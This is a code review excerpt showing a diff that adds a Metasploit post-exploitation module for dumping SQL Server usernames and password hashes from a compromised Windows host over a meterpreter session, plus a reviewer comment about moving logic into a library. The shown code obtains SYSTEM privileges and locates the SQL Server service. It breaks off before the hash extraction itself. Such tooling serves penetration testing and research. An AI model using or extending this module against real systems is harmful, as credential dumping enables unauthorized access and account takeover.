modules/post/windows/gather/credentials/mssql_local_hashdump.rb

```diff
@@ -0,0 +1,176 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/auxiliary/report'
+require 'msf/core/post/windows/mssql'
+
+
+class Metasploit3 < Msf::Post
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::MSSQL
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows Gather Local SQL Server Hash Dump',
+        'Description'   => %q{ This module extracts the usernames and password
+        hashes from a MSSQL server and stores them in the loot using the
+        same technique in mssql_local_auth_bypass (Credits: Scott Sutherland)
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Mike Manzotti <mike.manzotti[at]dionach.com>'],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+      ))
+
+    register_options(
+      [
+        OptString.new('INSTANCE',  [false, 'Name of target SQL Server instance', nil])
+      ], self.class)
+  end
+
+  def run
+    # Set instance name (if specified)
+    instance = datastore['INSTANCE'].to_s
+
+    # Display target
+    print_status("Running module against #{sysinfo['Computer']}")
+
+    # Identify available native SQL client
+    get_sql_client
+    fail_with(Exploit::Failure::Unknown, 'Unable to identify a SQL client') unless @sql_client
+
+    # Get LocalSystem privileges
+    system_status = get_system
+    fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status
+
+    begin
+      service = check_for_sqlserver(instance)
+      fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service
+
+      print_status("Identified service '#{service[:display]}', PID: #{service[:pid]}")
+      instance_name = service[:display].gsub('SQL Server (','').gsub(')','').lstrip.rstrip
```

Comment:
Thinking about this, it probably needs to move to the library so we can properly handle versions 7, 2k as well.